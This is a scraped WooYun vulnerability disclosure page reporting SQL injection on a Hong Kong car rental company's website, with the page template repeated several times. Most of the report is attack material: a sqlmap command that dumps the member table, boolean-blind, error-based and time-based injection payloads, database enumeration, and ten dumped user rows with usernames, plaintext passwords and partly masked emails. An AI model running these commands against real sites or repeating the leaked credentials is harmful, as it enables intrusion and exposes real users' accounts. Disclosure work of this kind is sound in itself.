皇牌租車服務有限公司某站存在SQL插入攻擊（154萬用戶session泄露+大量用戶郵箱及密碼泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153322

漏洞标题：皇牌租車服務有限公司某站存在SQL插入攻擊（154萬用戶session泄露+大量用戶郵箱及密碼泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-10 16:10

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-10：细节已通知厂商并且等待厂商处理中
2015-11-20：厂商已经确认，细节仅向厂商公开
2015-11-30：细节向核心白帽子及相关领域专家公开
2015-12-10：细节向普通白帽子公开
2015-12-20：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

以客為本『至誠周到、華麗顯赫』是皇牌旅運的服務宗旨。自 2004 年成立皇牌旅運有限公司以來，憑着務實作風，積極進取，短短數年間，逐漸得到租車服務業界認同和顧客肯定，客戶人數亦不斷增加。本租車公司所有員工均達到優質服務及專業水平，足以解决所有汽車美容及汽車租賃上之問題。
為求提昇租車服務之質素，本公司由 2011 年 7 月起已遷往新蒲崗大有街, 繼續提供客戶各項租車服務, 把〝優質服務〞邁向新紀元。

详细说明：

地址：http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm

python sqlmap.py -u "http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm" -p cnt --technique=BET --random-agent -D c1v -T member -C id,id_passwd,name,passwd,email,isadmin --dump --start 1 --stop 10

1. 154萬用戶session

web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1
Database: c1v
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| `session` | 1541977 |

2. 用户邮箱密码

back-end DBMS: MySQL 5.1
Database: c1v
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| member    | 1268    |

Database: c1v
Table: member
[10 entries]
+-----+-----------+----------------------+------------+---------------------------+---------+
| id  | id_passwd | name                 | passwd     | email                     | isadmin |
+-----+-----------+----------------------+------------+---------------------------+---------+
| 1   |           |                      |            | uadmin                    |         |
| 4   |           | adm1                 | adm1       |                           | 1       |
| 13  |           | info@**.**.**.**       | <blank>    | info@**.**.**.**            | 0       |
| 14  |           | biken@**.**.**.**      | <blank>    | biken@**.**.**.**           | 0       |
| 15  |           | unittime@**.**.**.** | <blank>    | unittime@**.**.**.**      | 0       |
| 193 |           | admin                | admin      | admin@**.**.**.** | 1       |
| 197 |           | annielip1227         | 27121971   | annielip1227@**.**.**.** | 0       |
| 199 |           | ilvrabbit            | 811529     | aman@**.**.**.**       | 0       |
| 200 |           | CML0700365           | CML0700365 | poohissopoor@**.**.**.** | 0       |
| 201 |           | cindy625             | 333999     | cindy625@**.**.**.**        | 0       |
+-----+-----------+----------------------+------------+---------------------------+---------+

漏洞证明：

available databases [1]:
[*] c1v
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cnt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm
---
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cnt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm
---
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1
Database: c1v
[10 tables]
+----------+
| session  |
| album    |
| article  |
| category |
| currency |
| item     |
| member   |
| post     |
| subject  |
| topic    |
+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cnt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm
---
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1
Database: c1v
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| `session` | 1541977 |
| item      | 8172    |
| article   | 1445    |
| member    | 1268    |
| category  | 346     |
| subject   | 11      |
| currency  | 4       |
| topic     | 3       |
| post      | 2       |
| album     | 1       |
+-----------+---------+

Database: c1v
Table: member
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| data      | non-numeric |
| email     | non-numeric |
| id        | numeric     |
| id_passwd | numeric     |
| isadmin   | numeric     |
| name      | non-numeric |
| passwd    | non-numeric |
| vid       | numeric     |
+-----------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cnt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm
---
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1
Database: c1v
Table: member
[10 entries]
+-----+-----------+----------------------+------------+---------------------------+---------+
| id  | id_passwd | name                 | passwd     | email                     | isadmin |
+-----+-----------+----------------------+------------+---------------------------+---------+
| 1   |           |                      |            | uadmin                    |         |
| 4   |           | adm1                 | adm1       |                           | 1       |
| 13  |           | info@**.**.**.**       | <blank>    | info@**.**.**.**            | 0       |
| 14  |           | biken@**.**.**.**      | <blank>    | biken@**.**.**.**           | 0       |
| 15  |           | unittime@**.**.**.** | <blank>    | unittime@**.**.**.**      | 0       |
| 193 |           | admin                | admin      | admin@**.**.**.** | 1       |
| 197 |           | annielip1227         | 27121971   | annielip1227@**.**.**.** | 0       |
| 199 |           | ilvrabbit            | 811529     | aman@**.**.**.**       | 0       |
| 200 |           | CML0700365           | CML0700365 | poohissopoor@**.**.**.** | 0       |
| 201 |           | cindy625             | 333999     | cindy625@**.**.**.**        | 0       |
+-----+-----------+----------------------+------------+---------------------------+---------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-11-20 15:09

厂商回复：

Referred to related parties.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153322

漏洞标题：皇牌租車服務有限公司某站存在SQL插入攻擊（154萬用戶session泄露+大量用戶郵箱及密碼泄露）（香港地區）

相关厂商：皇牌租車服務有限公司

漏洞作者：路人甲

提交时间：2015-11-10 16:10

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153322

漏洞标题：皇牌租車服務有限公司某站存在SQL插入攻擊（154萬用戶session泄露+大量用戶郵箱及密碼泄露）（香港地區）

相关厂商：皇牌租車服務有限公司

漏洞作者： 路人甲

提交时间：2015-11-10 16:10

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153322"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云